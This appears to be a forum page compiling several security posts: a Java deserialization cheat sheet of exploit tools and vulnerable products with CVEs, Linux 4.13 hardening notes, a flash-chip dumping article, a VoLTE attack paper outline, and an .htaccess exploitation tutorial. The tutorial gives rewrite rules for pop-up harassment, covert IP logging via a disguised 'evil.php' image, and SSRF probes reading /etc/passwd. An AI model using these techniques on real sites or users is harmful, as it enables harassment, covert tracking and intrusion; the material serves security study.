Java Deserialization Vulnerabilities - The Forgotten Bug Class
Pwning Your Java Messaging With Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
A Journey From JNDI/LDAP Manipulation To Remote Code Execution Dream Land
by @pwntester and O. Mirosh
Fixing the Java Serialization mess
by @e_rnst
Blind Java Deserialization
by deadcode.me
Payload generators
ysoserial
https://github.com/frohoff/ysoserial
RCE (or smth else) via:
- Apache Commons Collections <= 3.1
- Apache Commons Collections <= 4.0
- Groovy <= 2.3.9
- Spring Core <= 4.1.4 (?)
- JDK <=7u21
- Apache Commons BeanUtils 1.9.2 + Commons Collections <=3.1 + Commons Logging 1.2 (?)
- BeanShell 2.0
- Groovy 2.3.9
- Jython 2.5.2
- C3P0 0.9.5.2
- Apache Commons Fileupload <= 1.3.1 (File uploading, DoS)
- ROME 1.0
- MyFaces
- JRMPClient/JRMPListener
- JSON
- Hibernate
Additional tools (integration ysoserial with Burp Suite):
Full shell (pipes, redirects and other stuff):
- $@|sh – Or: Getting a shell environment from Runtime.exec
- Set String[] for Runtime.exec (patch ysoserial's payloads)
- Shell Commands Converter
How it works:
- https://blog.srcclr.com/commons-collections-deserialization-vulnerability-research-findings/
- http://gursevkalra.blogspot.ro/2016/01/ysoserial-commonscollections1-exploit.html
JRE8u20_RCE_Gadget
https://github.com/pwntester/JRE8u20_RCE_Gadget
Pure JRE 8 RCE Deserialization gadget
ACEDcup
https://github.com/GrrrDog/ACEDcup
File uploading via:
- Apache Commons FileUpload <= 1.3 (CVE-2013-2186) and Oracle JDK < 7u40
Universal billion-laughs DoS
https://gist.github.com/coekie/a27cc406fc9f3dc7a70d
Won't fix DoS via default Java classes (JRE)
Universal Heap overflows DoS using Arrays and HashMaps
https://github.com/topolik/ois-dos/
How it works:
Won't fix DoS using default Java classes (JRE)
Exploits
no spec tool - You don't need a special tool (just Burp/ZAP + payload)
RMI
- Protocol
- Default - 1099/tcp for rmiregistry
ysoserial (works only against a RMI registry service)
JMX
- Protocol based on RMI
- partially patched in JRE
JNDI/LDAP
- When we control an adrress for lookup of JNDI (context.lookup(address) and can have backconnect from a server
- Full info
- JNDI remote code injection
https://github.com/zerothoughts/jndipoc
JMS
JSF ViewState
- if no encryption or good mac
no spec tool
T3 of Oracle Weblogic
- Protocol
- Default - 7001/tcp on localhost interface
- CVE-2015-4852
loubia (tested on 11g and 12c, supports t3s)
JavaUnserializeExploits (doesn't work for all Weblogic versions)
IBM Websphere 1
- wsadmin
- Default port - 8880/tcp
- CVE-2015-7450
IBM Websphere 2
- When using custom form authentication
- WASPostParam cookie
- Full info
no spec tool
Red Hat JBoss
- http://jboss_server/invoker/JMXInvokerServlet
- Default port - 8080/tcp
- CVE-2015-7501
https://github.com/njfox/Java-Deserialization-Exploit
Jenkins
- Jenkins CLI
- Default port - High number/tcp
- CVE-2015-8103
- CVE-2015-3253
Jenkins 2
- patch "bypass" for Jenkins
- CVE-2016-0788
- Details of exploit
Jenkins 3
- Jenkins CLI LDAP
- Default port - High number/tcp
- <= 2.32
- <= 2.19.3 (LTS)
- CVE-2016-9299
Metasploit Module for CVE-2016-9299
Restlet
- <= 2.1.2
- When Rest API accepts serialized objects (uses ObjectRepresentation)
no spec tool
RESTEasy
- *When Rest API accepts serialized objects (uses @Consumes({"*/*"}) or "application/*" )
- Details and examples
no spec tool
OpenNMS
- RMI
Progress OpenEdge RDBMS
- all versions
- RMI
Commvault Edge Server
- CVE-2015-7253
- Serialized object in cookie
no spec tool
Symantec Endpoint Protection Manager
- /servlet/ConsoleServlet?ActionType=SendStatPing
- CVE-2015-6555
Oracle MySQL Enterprise Monitor
- https://[target]:18443/v3/dataflow/0/0
- CVE-2016-3461
no spec tool
PowerFolder Business Enterprise Suite
- custom(?) protocol (1337/tcp)
- MSA-2016-01
Solarwinds Virtualization Manager
- <= 6.3.1
- RMI
- CVE-2016-3642
Cisco Prime Infrastructure
- https://[target]/xmp_data_handler_service/xmpDataOperationRequestServlet
- <= 2.2.3 Update 4
- <= 3.0.2
- CVE-2016-1291
CoalfireLabs/java_deserialization_exploits
Cisco ACS
- <= 5.8.0.32.2
- RMI (2020 tcp)
- CSCux34781
Apache XML-RPC
- all version, no fix (the project is not supported)
- POST XML request with ex:serializable element
- Details and examples
no spec tool
Apache Archiva
- because it uses Apache XML-RPC
- CVE-2016-5004
- Details and examples
no spec tool
SAP NetWeaver
- https://[target]/developmentserver/metadatauploader
- CVE-2017-9844
Sun Java Web Console
- admin panel for Solaris
- < v3.1.
- old DoS sploit
no spec tool
Apache MyFaces Trinidad
- 1.0.0 <= version < 1.0.13
- 1.2.1 <= version < 1.2.14
- 2.0.0 <= version < 2.0.1
- 2.1.0 <= version < 2.1.1
- it does not check MAC
- CVE-2016-5004
no spec tool
Apache Tomcat JMX
OpenText Documentum D2
- version 4.x
- CVE-2017-5586
Apache ActiveMQ - Client lib
Redhat/Apache HornetQ - Client lib
Oracle OpenMQ - Client lib
IBM WebSphereMQ - Client lib
Oracle Weblogic - Client lib
Pivotal RabbitMQ - Client lib
IBM MessageSight - Client lib
IIT Software SwiftMQ - Client lib
Apache ActiveMQ Artemis - Client lib
Apache QPID JMS - Client lib
Apache QPID - Client lib
Amazon SQS Java Messaging - Client lib
Detect
Code review
- ObjectInputStream.readObject
- ObjectInputStream.readUnshared
- Tool: Find Security Bugs
- Tool: Serianalyzer
Traffic
- Magic bytes 'ac ed 00 05' bytes
- 'rO0' for Base64
- 'application/x-java-serialized-object' for Content-Type header
Network
- Nmap >=7.10 has more java-related probes
- use nmap --all-version to find JMX/RMI on non-standart ports
Burp plugins
Vulnerable apps (without public sploits/need more info)
Spring Service Invokers (HTTP, JMS, RMI...)
SAP P4
Apache SOLR
- SOLR-8262
- 5.1 <= version <=5.4
- /stream handler uses Java serialization for RPC
Apache Shiro
- SHIRO-550
- encrypted cookie (with the hardcoded key)
Apache ActiveMQ (2)
Atlassian Bamboo (1)
- CVE-2015-6576
- 2.2 <= version < 5.8.5
- 5.9.0 <= version < 5.9.7
Atlassian Bamboo (2)
- CVE-2015-8360
- 2.3.1 <= version < 5.9.9
- Bamboo JMS port (port 54663 by default)
Atlassian Jira
- only Jira with a Data Center license
- RMI (port 40001 by default)
- JRA-46203
Akka
- version < 2.4.17
- "an ActorSystem exposed via Akka Remote over TCP"
- Official description
Spring AMPQ
- CVE-2016-2173
- 1.0.0 <= version < 1.5.5
Apache Tika
- CVE-2016-6809
- 1.6 <= version < 1.14
- Apache Tika’s MATLAB Parser
Apache HBase
Apache Camel
Gradle (gui)
- custom(?) protocol(60024/tcp)
- article
Oracle Hyperion
Oracle Application Testing Suite
Red Hat JBoss BPM Suite
VMWare vRealize Operations
- 6.0 <= version < 6.4.0
- REST API
- VMSA-2016-0020
- CVE-2016-7462
VMWare vCenter/vRealize (various)
Cisco (various)
Lexmark Markvision Enterprise
McAfee ePolicy Orchestrator
HP iMC
HP Operations Orchestration
HP Asset Manager
HP Service Manager
HP Operations Manager
HP Release Control
HP Continuous Delivery Automation
HP P9000, XP7 Command View Advanced Edition (CVAE) Suite
HP Network Automation
Adobe Experience Manager
Unify OpenScape (various)
- CVE-2015-8237
- RMI (30xx/tcp)
- CVE-2015-8238
- js-soc protocol (4711/tcp)
Apache TomEE
IBM Congnos BI
Novell NetIQ Sentinel
ForgeRock OpenAM
- 9-9.5.5, 10.0.0-10.0.2, 10.1.0-Xpress, 11.0.0-11.0.3 and 12.0.0
- 201505-01
F5 (various)
Hitachi (various)
Apache OFBiz
NetApp (various)
Apache Tomcat
- requires local access
- CVE-2016-0714
- Article
Zimbra Collaboration
- version < 8.7.0
- CVE-2016-3415
Apache Batchee
Apache JCS
Apache OpenJPA
Apache OpenWebBeans
Protection
- Look-ahead Java deserialization
- NotSoSerial
- SerialKiller
- ValidatingObjectInputStream
- Name Space Layout Randomization
- Some protection bypasses
- Tool: Serial Whitelist Application Trainer
- JEP 290: Filter Incoming Serialization Data in JDK 6u141, 7u131, 8u121
For Android
- One Class to Rule Them All: 0-Day Deserialization Vulnerabilities in Android
- Android Serialization Vulnerabilities Revisited
XMLEncoder (XML)
How it works:
- http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
- Java Unmarshaller Security
Payload generators:
XStream (XML/JSON/various)
How it works:
- http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
- http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
- https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream
- Java Unmarshaller Security
Payload generators:
Vulnerable apps (without public sploits/need more info):
Atlassian Bamboo
Jenkins
Kryo (binary)
How it works:
- https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo
- Java Unmarshaller Security
Payload generators:
Hessian/Burlap (binary/XML)
How it works:
Payload generators:
Castor (XML)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
OpenNMS
json-io (JSON)
How it works:
Payload generators:
Jackson (JSON)
vulnerable in some configuration
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Apache Camel
Red5 IO AMF (AMF)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Apache OpenMeetings
Apache Flex BlazeDS (AMF)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Adobe ColdFusion
- CVE-2017-3066
- <= 2016 Update 3
- <= 11 update 11
- <= 10 Update 22
Apache BlazeDS
VMWare VCenter
Flamingo AMF (AMF)
How it works:
GraniteDS (AMF)
How it works:
WebORB for Java (AMF)
How it works:
SnakeYAML (YAML)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Resteasy
Apache Camel
Apache Brooklyn
jYAML (YAML)
How it works:
Payload generators:
YamlBeans (YAML)
How it works:
Payload generators:
"Safe" deserialization
Some serialization libs are safe (or almost safe) https://github.com/mbechler/marshalsec
However, it's not a recomendation, but just a list of other libs that has been researched by someone:
- JAXB
- XmlBeans
- Jibx
- ProtobufGSON
- GWT-RPC
Sursa: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
-
9/5/2017
security things in Linux v4.13
Previously: v4.12.
Here’s a short summary of some of interesting security things in Sunday’s v4.13 release of the Linux kernel:
security documentation ReSTification
The kernel has been switching to formatting documentation with ReST, and I noticed that none of the Documentation/security/ tree had been converted yet. I took the opportunity to take a few passes at formatting the existing documentation and, at Jon Corbert’s recommendation, split it up between end-user documentation (which is mainly how to use LSMs) and developer documentation (which is mainly how to use various internal APIs). A bunch of these docs need some updating, so maybe with the improved visibility, they’ll get some extra attention.CONFIG_REFCOUNT_FULL
Since Peter Zijlstra implemented the refcount_t API in v4.11, Elena Reshetova (with Hans Liljestrand and David Windsor) has been systematically replacing atomic_t reference counters with refcount_t. As of v4.13, there are now close to 125 conversions with many more to come. However, there were concerns over the performance characteristics of the refcount_t implementation from the maintainers of the net, mm, and block subsystems. In order to assuage these concerns and help the conversion progress continue, I added an “unchecked” refcount_t implementation (identical to the earlier atomic_t implementation) as the default, with the fully checked implementation now available under CONFIG_REFCOUNT_FULL. The plan is that for v4.14 and beyond, the kernel can grow per-architecture implementations of refcount_t that have performance characteristics on par with atomic_t (as done in grsecurity’s PAX_REFCOUNT).CONFIG_FORTIFY_SOURCE
Daniel Micay created a version of glibc’s FORTIFY_SOURCE compile-time and run-time protection for finding overflows in the common string (e.g. strcpy, strcmp) and memory (e.g. memcpy, memcmp) functions. The idea is that since the compiler already knows the size of many of the buffer arguments used by these functions, it can already build in checks for buffer overflows. When all the sizes are known at compile time, this can actually allow the compiler to fail the build instead of continuing with a proven overflow. When only some of the sizes are known (e.g. destination size is known at compile-time, but source size is only known at run-time) run-time checks are added to catch any cases where an overflow might happen. Adding this found several placeswhere minor leaks were happening, and Daniel and I chased down fixes for them.One interesting note about this protection is that is only examines the size of the whole object for its size (via __builtin_object_size(..., 0)). If you have a string within a structure, CONFIG_FORTIFY_SOURCE as currently implemented will make sure only that you can’t copy beyond the structure (but therefore, you can still overflow the string within the structure). The next step in enhancing this protection is to switch from 0 (above) to 1, which will use the closest surrounding subobject (e.g. the string). However, there are a lot of cases where the kernel intentionally copies across multiple structure fields, which means more fixes before this higher level can be enabled.
NULL-prefixed stack canary
Rik van Riel and Daniel Micay changed how the stack canary is defined on 64-bit systems to always make sure that the leading byte is zero. This provides a deterministic defense against overflowing string functions (e.g. strcpy), since they will either stop an overflowing read at the NULL byte, or be unable to write a NULL byte, thereby always triggering the canary check. This does reduce the entropy from 64 bits to 56 bits for overflow cases where NULL bytes can be written (e.g. memcpy), but the trade-off is worth it. (Besdies, x86_64’s canary was 32-bits until recently.)IPC refactoring
Partially in support of allowing IPC structure layouts to be randomized by the randstruct plugin, Manfred Spraul and I reorganized the internal layout of how IPC is tracked in the kernel. The resulting allocations are smaller and much easier to deal with, even if I initially missed a few needed container_of() uses.randstruct gcc plugin
I ported grsecurity’s clever randstruct gcc plugin to upstream. This plugin allows structure layouts to be randomized on a per-build basis, providing a probabilistic defense against attacks that need to know the location of sensitive structure fields in kernel memory (which is most attacks). By moving things around in this fashion, attackers need to perform much more work to determine the resulting layout before they can mount a reliable attack.Unfortunately, due to the timing of the development cycle, only the “manual” mode of randstruct landed in upstream (i.e. marking structures with __randomize_layout). v4.14 will also have the automatic mode enabled, which randomizes all structures that contain only function pointers.
A large number of fixes to support randstruct have been landing from v4.10 through v4.13, most of which were already identified and fixed by grsecurity, but many were novel, either in newly added drivers, as whitelisted cross-structure casts, refactorings (like IPC noted above), or in a corner case on ARM found during upstream testing.
lower ELF_ET_DYN_BASE
One of the issues identified from the Stack Clash set of vulnerabilities was that it was possible to collide stack memory with the highest portion of a PIE program’s text memory since the default ELF_ET_DYN_BASE (the lowest possible random position of a PIE executable in memory) was already so high in the memory layout (specifically, 2/3rds of the way through the address space). Fixing this required teaching the ELF loader how to load interpreters as shared objects in the mmap region instead of as a PIE executable (to avoid potentially colliding with the binary it was loading). As a result, the PIE default could be moved down to ET_EXEC (0x400000) on 32-bit, entirely avoiding the subset of Stack Clash attacks. 64-bit could be moved to just above the 32-bit address space (0x100000000), leaving the entire 32-bit region open for VMs to do 32-bit addressing, but late in the cycle it was discovered that Address Sanitizer couldn’t handle it moving. With most of the Stack Clash risk only applicable to 32-bit, fixing 64-bit has been deferred until there is a way to teach Address Sanitizer how to load itself as a shared object instead of as a PIE binary.early device randomness
I noticed that early device randomness wasn’t actually getting added to the kernel entropy pools, so I fixed that to improve the effectiveness of the latent_entropy gcc plugin.That’s it for now; please let me know if I missed anything. As a side note, I was rather alarmed to discover that due to all my trivial ReSTification formatting, and tiny FORTIFY_SOURCE and randstruct fixes, I made it into the most active 4.13 developers list (by patch count) at LWN with 76 patches: a whopping 0.6% of the cycle’s patches.
Anyway, the v4.14 merge window is open!
© 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Sursa: https://outflux.net/blog/archives/2017/09/05/security-things-in-linux-v4-13/
-
Flash Dumping - Part I
Date Tue 05 September 2017 By Emma Benoit Guillaume Heilles Philippe Teuwen Category Hardware. Tags PCB flash KiCADFirst part of a blog post series about our approach to dump a flash chip. In this article we describe how to desolder the flash, design and build the corresponding breakout board.
This blog post series will detail simple yet effective attacks against embedded devices non-volatile memories. This type of attack enables you to do the following:
- read the content of a memory chip;
- modify the content of a memory chip;
- monitor the accesses from/to a memory chip and modifying them on the fly (Man-In-The-Middle attack).
In particular, the following topics will be discussed:
- Desoldering of a flash chip;
- Conception of a breakout board with KiCAD;
- PCB fabrication and microsoldering;
- Addition of a breakout board on an IoT device;
- Dump of a SPI flash;
- Dump of a parallel flash;
- Man-in-the-Middle attacks.
Let's say you opened up yet-another-IoT-device and stumbled on a flash chip inside. Curious as you are, you obviously want to know what's going on inside.
Desoldering the flash chip
To read the content of the flash chip, there are basically two options :
- connecting wires directly on the pins of the chip;
- desoldering the flash and plug it on another board.
One of the things to consider when choosing a method to read the chip is the packaging of the integrated circuit (IC). For example, connecting wires directly on the pins of the chip works well with chips using a quad flat pack (QFP) packaging, but it's less adapted if there are no visible pins. In the following case, the flash chip uses a ball grid array (BGA) packaging, which means no visible pin to fiddle with, so we choose to desolder the IC.
Picture of our target chip:
On the bright side:
- Since we're extracting the flash, all possible interferences with the onboard microcontroller are avoided.
- The chip is removed completely from the board, which gives us the ability to study the PCB underneath and find out the routing to the flash chip.
- The original chip can be replaced with something else (another chip, a microcontroller, ...).
On the less bright side:
- The board cannot run without all of its components, you'll have to solder it back if you want to use it in the future.
- Some nearby components could be damaged during the extraction.
- The flash chip itself could be damaged if it's done improperly.
So... desoldering flash, right? If you never tried desoldering electronic components before, the tricky part is to melt the solder on all pins at the same time. There are several techniques to do that. We choose to go with the heat gun. The goal is to heat the area where the chip is, wait for the solder to melt and remove the chip.
This technique is simple and rapid but it tends to desolder adjacent components, so be careful not to move them (i.e. this is exactly the worst moment to sneeze).
The picture below shows our chip out of its emplacement and we can now have a look at the PCB routing. We can already make some hypothesis, like the two bottom rows which are likely unused since they are not routed.
Conception of a breakout board with KiCAD
What do we do now with that chip? BGA layouts are a mess, you can have a 5x5 grid or a 4x6 grid for the exact same chip. Pinouts are equally fun, and usually specific to the chip. Another thing you might be wondering is how to access a particular pin when they are all packed together in a grid like that?
One solution is to make a breakout board! Basically, a breakout board mirrors all the pins of the chip but with more space between them, so you can access them easily.
To realize this, we first need to gather some information about the chip itself. Most of the time, the brand and/or model are written on the chip and help identifying it. With this information, one can look for the corresponding datasheets. If you can't identify the chip or if you can't find the datasheet, you will have to do some reverse engineering on the PCB to identify each signal.
The brand is indicated on the first line of our chip: MXIC stands for Macronix International. The second line is the model of the chip, which leads us to the MX25L3255EXCI datasheet.
The section that is of interest to us is the pin layout, page 7 of the datasheet. Both BGA configurations (4x6 and 5x5) are described as well as a SOP8 package. We can see that only eight pins are useful, other pins are tagged "NC" which means "no connection".
To communicate with the flash chip, we need a PCB exporting all the required pins to some easy-to-access header.
The design of the PCB can be realized using KiCAD, one of the most popular electronics design automation (EDA) software.
If you are not familiar with KiCAD, many great tutorials are available like KiCAD Quick-Start Tutorial.
The design of a breakout board follows the same process as for any other board:
- Create an electronic schematic for your board in eeschema, and define the components that are specific to your project, for example your flash chip.
- Create the specific footprint for your flash chip in pcbnew. This is where the information from the datasheet that we looked earlier is useful. We will add a 4x6 grid representing the BGA grid, and two 1x4 connectors linked to the 8 useful pins. The final step is to add routes to connect our components
Our design is done, how do we transform a KiCAD project into a working PCB?
PCB fabrication
A PCB is basically a sandwich made of a layer of substrate between two layers of copper. The substrate is usually made of FR-4 (glass-reinforced epoxy laminate) but other cheaper materials can also be found. Routes are traced on the copper layer and the excess copper is then removed.
Several techniques exist to remove the unwanted copper, we tried the following:
- Etching;
- CNC milling.
Both techniques are detailed, as we used the etching technique to build the 4x6 BGA PCB and the milling technique was used to build the 5x5 BGA PCB.
Etching
Etching refers to the process of using a chemical component to "bite" into the unprotected surface of a metal. We use ink as a way to delimit the traces and protect the bits of copper to keep.
- We use the toner transfer method to reproduce the design on copper. The design is printed on a glossy sheet of paper using a laser printer. The sheet of paper is then taped to the piece of copper/fiber glass substrate, and heat and pressure are applied to get the design out of the paper onto the copper board. Usually, this technique uses a regular clothes iron to apply heat and pressure. We found out that using a laminator is way more efficient as the heat and the pressure applied are more uniform.
- Next step is the actual etching. The board is immersed into a chemical solution which will remove excess copper, except where the toner is.
Our breakout board after etching, still with the transferred toner attached:
And after removing the toner with acetone:
The PCB board is now ready for microsoldering. Microsoldering is like soldering but with tiny components, hence it requires a microscope.
Another difference with traditional soldering is the packaging of the solder. Traditional soldering uses solder in the form of wire while BGA microsoldering uses solder balls.
Next, we can start reballing:
- put a new solder ball in each slot and apply heat to melt the solder balls in place;
- align the chip and the board;
- reflow.
The board being reballed:
And the final result with the chip and the board after microsoldering:
CNC Milling
Alternatively, a CNC milling machine can be used to carve out bits of unwanted copper. Actually rather than removing all the unwanted copper, the CNC will simply isolate the required tracks and leave the excess of copper in place.
1. The 5x5 BGA format was used to build a PCB. While the 4x6 version was a breakout board, we designed the 5x5 version such that it can be directly plugged in a universal EEPROM programmer ZIF socket. As we've seen in the datasheet, this chip also exists in SOP8 package, so we've chosen to mimic a DIP8 pin header reproducing the same pin layout as for the SOP8. So for the universal EEPROM programmer, this setup will be virtually the same as reading the SOP8 chip via a classic SOP8-DIP8 adapter.
2. The footprint for the chip is somehow similar to the one we designed for the 4x6 but with a 5x5 grid, the 1x4 connectors closer, as for a DIP8, and a somehow more tortuous routing to respect the SOP8 layout which is unfortunately completely different from the BGA one.
3. KiCAD is not able to produce directly a file compatible with a CNC, therefore we'll use Flatcam which takes a Gerber file and allows to define a path for the CNC to isolate the desired copper tracks. To avoid shortage issues, we also define an area under the BGA chip to remove entirely the unwanted copper.
4. And we pass the produced STL file to bCNC, in charge of controlling the CNC. It has some nice features such as auto-levelling, i.e. measuring the actual height of the board in several points (because nothing is perfectly flat), and producing the heat map you can see in the snapshot below.
Milling in action, corresponding to the tracks highlighted in green in bCNC:
- Board fully milled:
Close up of the final result where we can distinguish the pattern of the flatcam geometry path under the BGA:
6. Next, we apply some solder mask, which is the characteristic green layer protecting the copper from oxidation, and cure it with UV light.
7. The solder mask covered the pads of the BGA and of the 1x4 connectors, they are unusable like this. We scratch manually the thin layer of paint to free the pads.
- Tinning step, where we apply solder on all pads:
- Back to the CNC to drill the holes and cut the edges of the board:
- Final board with the BGA chip soldered and ready to be inserted in a universal EEPROM programmer:
As we've chosen to mimic the SOP8 pinout, we've simply to tell to the programmer that our chip is the SOP8 version!
Bonus: the horror show
Here is a compilation of our best failures, because things don't always go as planned, but we learned a lot through these experimentations and we are now ready for the next IoT stuff
Toner transfer is not always as easy as it sounds...
Milling on the CNC with the right depth neither...
Failing at finding a plastic that doesn't adhere to the green mask... (eventually IKEA freezing bags revealed to work very well
)
Attempt to mill the green mask...
Second attempt with a tool mounted on a spring: looks almost good but actually all tracks were cut from the pads...
Third attempt by adding first some solder in the hope to make them thicker
Created a lake of green mask too thick to cure with UV light, and when the surface of the icy lake breaks...
Conclusion
That concludes our first article where we saw how to desolder a flash, design a PCB and detailed two techniques of PCB fabrication.
Acknowledgements
Thanks to all Quarkslab colleagues who proofread this article and provided valuable feedback.
-
1
-
TABLE OF CONTENTS 1 ABSTRACT_______________________________________________________________ 5 2 INTRODUCTION___________________________________________________________ 6 3 RELATED WORK __________________________________________________________ 8 4 BACKGROUND ___________________________________________________________ 9 4.1 Security Protocols 9 4.2 ISIM Authenticate 10 4.3 IP Multimedia Subsystem 10 5 PRACTICAL ATTACKS ____________________________________________________ 12 5.1 A1: Sniffing VoLTE/VoWiFi Interfaces 12 5.2 A2: ISIM sniffing for extracting CK/IK 13 5.3 A3: User location manipulation 16 5.4 A4: Roaming information manipulation 16 5.5 A5: Side channel attack 16 6 RESULTS _______________________________________________________________ 18 6.1 R1: Information Disclosures 18 6.2 R2.1: Keys in GSM SIM 20 6.3 R2.2: Authentication using IK 20 6.4 R3: User Location Manipulation 21 6.5 R4: Roaming Information Manipulation 22 6.6 R5: Side channel 22 7 MITIGATION _____________________________________________________________ 23 8 CONCLUSION ____________________________________________________________ 24 9 REFERENCES ____________________________________________________________ 25
-
1
-
-
http://insecurity.zone || Red Team || [SOON] Interactive hacking tutorial platform || Tools & exploits || Wargames/CTF's || IRC: http://irc.landSep 5
Utilizing .htaccess for exploitation purposes — PART #1
Author — MLT(@ret2libc)
This tutorial will cover ways in which .htaccess can be used within the context of web-based exploitation. It will detail a few different techniques, some of which are useful for penetration testing and bug bounty hunting, others which are capable of less damage but can still be abused maliciously, and methods that a blackhat hacker could use to perform watering hole attacks or infect users of compromised websites with malware. This guide will also detail a few other tricks that can efficiently abuse .htaccess for an attackers’ gain.
This is the first of a two-part series regarding uses of htaccess for exploitation purposes. I will cover some basic and somewhat well-known methods here, along with a few lesser known methods. In part 2, I will be moving onto more advanced methods of exploitation through use of htaccess.
In this guide I will attempt to explain various non-conventional uses of .htaccess which can be extremely useful for exploitation and post-exploitation purposes. I’m assuming most readers will have an understanding of .htaccess, but for those who don’t, I will offer a brief explanation. Regardless of how familiar you are with htaccess rules, I’m hoping this should still be easy enough to grasps.
Some of the methods I will be covering are a little outdated, but many of these still work to this date, and even the outdated methods discussed can still work in plenty instances when an attacker is targeting a server which doesn’t have all of their software up to date.
I will begin with a few methods that aren’t necessarily “exploits” as such, but rather just means of using mod_rewrite to be a general nuisance.
For those of you who aren’t familiar with what .htaccess is, here is a short explanation (taken from htmlgoodies.com because I’m lazy):
htaccess is short for Hypertext Access, and is a configuration file used by Apache-based web servers that controls the directory that it “lives” in — as well as all the subdirectories underneath that directory.
Many times, if you have installed a Content Management System (CMS), such as Drupal, Joomla or Wordpress, you likely encountered the .htaccess file. You may not have even had to edit it, but it was among the files that you uploaded to your web server.Some of the features of the .htaccess file include the ability to password protect folders, ban users or allow users using IP addresses, stop directory listings, redirect users to another page or directory automatically, create and use custom error pages, change the way files with certain extensions are utilized, or even use a different file as the index file by specifying the file extension or specific file.
In short, it’s a set of rules you include on your web-server (in a file named .htaccess) which allows you to perform options such as password protecting a directory or creating aliases for extensions so for example if you had a page such as http://site.com/something/file.php you could set a htaccess rule so that when the page loads it would take the user to http://site.com/something/file (hiding the extension) — or you could use it to do something like 302 redirect one page to another or HTTP 403 a directory.
Here is an example of what a htaccess file looks like:
### MAIN DEFAULTS
Options +ExecCGI -Indexes
DirectoryIndex index.html index.htm index.php
DefaultLanguage en-US
AddDefaultCharset UTF-8
ServerSignature OffInteresting side note, you should always add the ServerSignature Off directive because it prevents banner info from displaying your server information on directory listings (which makes the recon stage for an attacker slightly more awkward, every little helps!) — that being said, this should ideally be done through your httpd.conf rather than your htaccess file.
What I’m going to be primarily focusing on specifically is the rewrite module for apache within .htaccess (mod_rewrite) — this allows redirects to take place. So without further ado, let’s begin.
Trolling internet users with continuous pop-ups:
The first method I will be discussing is how to abuse mod_rewrites to troll people with continuous pop-ups on the site that they are attempting to use.
This is a very simple method, you would upload an image to your server and then you would use htaccess to password protect a directory and redirect the image to a file within that password protected directory. You will also need a .htpasswd file in addition to .htaccess which will contain the login credentials for the password protected directory.
This method is just a little fun, doesn’t have any real value but I’ve seen it exploited on popular forums before and it is pretty effective at trolling the hell out of people, so there’s always that.
For the purpose of this example, lets assume that we have two files, lol.jpg and umad.jpg wherein lol.jpg is stored in a public directory and umad.jpg is stored in a password protected directory.
here is an example of what your .htaccess file should look like:
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg /protected-directory/umad.jpg [NC]
AuthUserFile /home/usr/.htpasswd
AuthName “r u mad tho”
AuthType Basic
require user lololololololIn addition to this, you would need to setup a .htpasswd file that looks like something that follows:
username:encryptedPass
The username in this instance needs to match the username that you added to your .htaccess file. As for the encrypted password, this is generated via PHP’s crypt(); function. If you don’t want to use PHP (I don’t blame you), then online generators are also available to encrypt the password value in your .htpasswd file.
You could then set the path to lol.jpg as your signature on a forum for example, and every time someone views your thread or every time you post in a thread, it will repeatedly popup on their screen with a prompt to enter a username/password, which can get pretty annoying for them. It doesn’t necessarily have to be a forum either. If you’re on any form of website where you have an option for a custom avatar or profile image then you can abuse this method that way too (assuming it lets you set your profile image from a remote URL rather than just via a file upload form) — Anyone who’s browser renders your image will be repeatedly spammed with password prompt boxes (assuming the site you’re doing this on hasn’t came up with some way of patching it). This could be used for things like forum signatures, profile avatars, or pretty much just anything with image upload functionality that allows you to grab the image from a remote URL.
Browser fingerprinting and IP logging without user interaction:
This method is also utilizing a redirect trick, but it will allow you to trace people’s IP addresses (or do pretty much anything that you can do via executing PHP code) without them even being aware. This will allow you to perform browser fingerprinting in a stealthy manner, generally with the target being completely unaware.
Once again, it’s a simple mod rewrite like so (the only difference is we are redirecting to a PHP file here instead of a password protected dir):
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg /path/to/evil.php [NC]Let’s assume an attacker has two files hosted on their server, lol.jpg being a completely innocent image file, and evil.php being a PHP script used for information gathering.
Now, the plan here is to trick the server into thinking a valid image has been included. From the servers point of view, they are making a request to an image file. When it redirects to the PHP script though, no valid image is seen so the server would generally not include the image on the page (so no PHP would be executed). However, we can use PHP dynamic images into tricking the server into thinking it is including lol.jpg into the page rather than evil.php — we can make the PHP script output an image and it will also run any malicious code alongside it (logging an IP address in this case). This can be achieved via the imagecreate(); function, here is an example:
In the case of the example above, once the image is rendered in the users browser, it will write their user agent, IP address, referer header and other useful information for fingerprinting to a file on the attackers server. This would then allow an attacker to obtain information about the users location, or even craft tailored payloads in order to exploit the users browser.
So for example if there was a site where you had a profile, and you could set your profile image from a remote URL, then you could include lol.jpg as your image (from your URL) and htaccess would redirect it to the PHP script which then outputs an image, and the server gets tricked into thinking evil.php is lol.jpg and includes the image as your profile picture while executing any other PHP code that runs alongside it (in this case logging the IP address and user agent of anyone who views your profile). In addition to rewrite rules being used for this, AddType may also be used to achieve the same effect.
Filter Evasion for web-based vulnerabilities:
htaccess has several uses for filter evasion regarding web-based vulnerabilities. The two attack vectors that I will be discussing in this post are Server-Sided Request Forgery and Arbitrary File Upload.
Server-Sided Request Forgery:
For those who aren’t familiar with SSRF, it allows you to use various URI schemes to view local resources instead of requesting a remote resource, for example if there was a page like http://example.com/vuln.php?url=http://somesite.com then you could change the ‘?url=’ GET parameter to localhost to probe for information about a service running on a specific port, e.g:
http://127.0.0.1:3306
This would disclose information regarding the MySQL daemon running on the vulnerable server
file:/etc/passwd
This would allow an attacker to achieve Local File Disclosure through SSRF, allowing them to read the contents of local system files.
